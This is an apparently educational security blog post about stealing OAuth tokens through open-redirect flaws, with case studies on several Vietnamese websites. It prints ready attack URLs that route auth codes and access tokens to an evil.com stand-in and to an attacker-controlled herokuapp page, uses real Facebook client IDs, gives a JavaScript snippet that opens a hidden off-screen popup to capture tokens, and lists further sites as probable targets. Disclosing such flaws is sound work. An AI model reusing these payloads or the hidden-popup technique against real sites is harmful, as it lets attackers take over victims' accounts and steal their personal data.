OAuth token theft using open redirect
OAuth is an authorization framework, commonly used as a single sign-on solution or convenient "login via Facebook account" button. Despite its "simplicity" and good documentation, you can still config your system wrong.
A small mistake in the redirect_uri
filter configuration will break OAuth2's secure flow. If yourwebsite.com allow redirect_uri
to point to hackerwebsite.com, hackers can craft an URL, trick innocent, authorized people visit it, then stole their session (codes/tokens). A common way to bypass redirect_uri
filters is messing around open redirect flaw.
Let's see how hackers can exploit this misconfiguration to exploit some popular VN websites.
Case studies
Everything containing peaceful word in it is actual exploit code. Visit them only if you know what you are doing.
Zalo OA
Let's consider Zalo Official Account. After logging in, I used Burp Suite to intercept its authorization process. Basically, it works as follow:
- Request
http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=[3]
- Check cookies then append
uid
andcode
parameters to the URL - Authorize user with
[2]?callback=[3]&uid=[your-uid]&code=[your-auth-code]
- Redirect to [3] (Open redirect)
So, by pointing [3] to the attacker's site and appending %23
(#), the flow becomes:
- Request
http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=http://evil.com%23
- Check cookies then append uid and code parameters to the URL
- Authorize user with
[2]?callback=http://evil.com/#&uid=[your-uid]&code=[your-auth-code]
- Then redirect to
evil.com/#&uid=[your-uid]&code=[your-auth-code]
(everything after#
became an URL fragment) - The attacker can "log in" with stolen
[your-uid]
and[your-auth-code]
.
Reported: 04/08/2017
Lazada
Lazada allows users to log in using their Facebook accounts. Using a very professional, complex method commonly known as Googling, I found an open redirect flaw.
"lazada.vn" "redirect"
Easy enough: http://ho.lazada.vn/SHOYax?redirect=[target]
. In this case, it is:
http://ho.lazada.vn/SHOYax?redirect=http://peaceful-basin-79118.herokuapp.com/LazadaPoC.html
Note that, instead of the traditional flow, Lazada uses slightly modified variation, HTML5 postMessage flow, with an outdated Facebook SDK: after a user authorizes Lazada with Facebook, the fbsr_[app_id]
cookie will be set to his/her signed_request. Still, this does not prevent hackers from using traditional flow to create the payload:
https://www.facebook.com/v2.6/dialog/oauth?app_id=1503824746501801
&client_id=1503824746501801&display=popup&
&redirect_uri=http%3A%2F%2Fho.lazada.vn%2FSHOYax%3Fredirect%3Dhttp%3A%2F%2Fpeaceful-basin-79118.herokuapp.com%2FLazadaPoC.html%2F
&response_type=token%2Csigned_request
&scope=public_profile%2Cemail%2Cuser_birthday%2Cuser_friends&sdk=joey&version=v2.6
Reported: 04/08/2017
Viet ID
Look like the redirect_uri
is not filtered at all.
https://oauth.vietid.net/comment/login/enterPassword?cb=https%3A%2F%2Foauth.vietid.net%2Fcomment%2Fauthorize%3Fclient_id%3Dd9c694bd04eb35d96f1d71a84141d075%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FGenericPoC.html%253Fapp_key%253Dd9c694bd04eb35d96f1d71a84141d075%2526clearsession%253D1%26state%3D281d2b8a029e5e351d1413178b1bc92a%26state_uri%3D
5giay and alike
OK, I somewhat cheated, it's not really open redirect. The following URL will ask for confirmation and auto redirect after 5 seconds to target if the user doesn't press any button.
www.5giay.vn/redirect.php?[target]
Using a small popup at the corner of the screen may be a good idea:
window.open('https://www.facebook.com/v2.4/dialog/oauth?client_id=525129800895046&scope=public_profile,' +
'email&state=[attacker_state]&redirect_uri=https%3A%2F%2Fwww.5giay.vn%2Fredirect.php' +
'%3Fhttp%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FXenForo5giay.html%2523',
'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=1, height=1, visible=none', '');
The state
parameter just makes writing auto exploit just a little bit harder.
More interestingly, after dorking around, I found a lot of forums like 5giay.vn out there seem vulnerable to this kind of 'attack' as well.
Phimmoi (Failed attempt)
Similar to the Lazada case (victim might need to have his/her adblocker disabled):
Although Facebook accepts this as redirect_uri, the redirection does not include anything after &
character (treated as a parameter) and the website just uses the code response type (&code=.....
). Not exploitable.
Bonus
There are even more, but I am too busy recently (*cough* paying for college *cough* *cough*) to test them all. These websites might make it into the list (hey, I have not tested them, so don't quote me):
- http://vtcmobile.vn/oauth (80% sure; quite ironic)
- https://go.vn/oauth
- https://vegaid.vn
This article is for educational purpose and customers' safety only
Comments